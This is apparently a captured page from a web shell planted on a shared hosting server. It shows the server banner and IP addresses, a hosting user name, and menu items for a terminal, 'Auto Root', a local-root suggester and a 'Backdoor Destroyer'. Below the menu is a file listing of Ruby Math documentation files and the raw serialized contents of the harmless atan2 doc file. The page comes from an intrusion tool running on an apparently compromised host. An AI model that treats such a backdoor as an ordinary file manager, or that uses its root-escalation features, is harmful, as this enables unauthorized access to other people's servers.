Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
Math /
Delete
Unzip
Name
Size
Permission
Date
Action
DomainError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
acos-c.ri
506
B
-rw-r--r--
2023-07-26 18:33
acosh-c.ri
506
B
-rw-r--r--
2023-07-26 18:33
asin-c.ri
517
B
-rw-r--r--
2023-07-26 18:33
asinh-c.ri
534
B
-rw-r--r--
2023-07-26 18:33
atan-c.ri
517
B
-rw-r--r--
2023-07-26 18:33
atan2-c.ri
1.4
KB
-rw-r--r--
2023-07-26 18:33
atanh-c.ri
514
B
-rw-r--r--
2023-07-26 18:33
cbrt-c.ri
1.2
KB
-rw-r--r--
2023-07-26 18:33
cdesc-Math.ri
1.35
KB
-rw-r--r--
2023-07-26 18:33
cos-c.ri
559
B
-rw-r--r--
2023-07-26 18:33
cosh-c.ri
525
B
-rw-r--r--
2023-07-26 18:33
erf-c.ri
489
B
-rw-r--r--
2023-07-26 18:33
erfc-c.ri
504
B
-rw-r--r--
2023-07-26 18:33
exp-c.ri
574
B
-rw-r--r--
2023-07-26 18:33
frexp-c.ri
609
B
-rw-r--r--
2023-07-26 18:33
gamma-c.ri
1.71
KB
-rw-r--r--
2023-07-26 18:33
hypot-c.ri
493
B
-rw-r--r--
2023-07-26 18:33
ldexp-c.ri
515
B
-rw-r--r--
2023-07-26 18:33
lgamma-c.ri
655
B
-rw-r--r--
2023-07-26 18:33
log-c.ri
216
B
-rw-r--r--
2023-07-26 18:33
log10-c.ri
583
B
-rw-r--r--
2023-07-26 18:33
log2-c.ri
606
B
-rw-r--r--
2023-07-26 18:33
sin-c.ri
558
B
-rw-r--r--
2023-07-26 18:33
sinh-c.ri
531
B
-rw-r--r--
2023-07-26 18:33
sqrt-c.ri
1.14
KB
-rw-r--r--
2023-07-26 18:33
tan-c.ri
519
B
-rw-r--r--
2023-07-26 18:33
tanh-c.ri
520
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI" atan2:ETI"Math::atan2;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"1Computes the arc tangent given +y+ and +x+. ;TI"CReturns a Float in the range -PI..PI. Return value is a angle ;TI"?in radians between the positive x-axis of cartesian plane ;TI"=and the point given by the coordinates (+x+, +y+) on it.;To:RDoc::Markup::BlankLine o; ; [I""Domain: (-INFINITY, INFINITY);T@o; ; [I"Codomain: [-PI, PI];T@o:RDoc::Markup::Verbatim; [I"3Math.atan2(-0.0, -1.0) #=> -3.141592653589793 ;TI"3Math.atan2(-1.0, -1.0) #=> -2.356194490192345 ;TI"4Math.atan2(-1.0, 0.0) #=> -1.5707963267948966 ;TI"4Math.atan2(-1.0, 1.0) #=> -0.7853981633974483 ;TI"%Math.atan2(-0.0, 1.0) #=> -0.0 ;TI"$Math.atan2(0.0, 1.0) #=> 0.0 ;TI"3Math.atan2(1.0, 1.0) #=> 0.7853981633974483 ;TI"3Math.atan2(1.0, 0.0) #=> 1.5707963267948966 ;TI"2Math.atan2(1.0, -1.0) #=> 2.356194490192345 ;TI"2Math.atan2(0.0, -1.0) #=> 3.141592653589793 ;TI"=Math.atan2(INFINITY, INFINITY) #=> 0.7853981633974483 ;TI"<Math.atan2(INFINITY, -INFINITY) #=> 2.356194490192345 ;TI">Math.atan2(-INFINITY, INFINITY) #=> -0.7853981633974483 ;TI"<Math.atan2(-INFINITY, -INFINITY) #=> -2.356194490192345;T:@format0: @fileI"math.c;T:0@omit_headings_from_table_of_contents_below0I" Math.atan2(y, x) -> Float ;T0[ I" (p1, p2);T@(FI" Math;TcRDoc::NormalModule00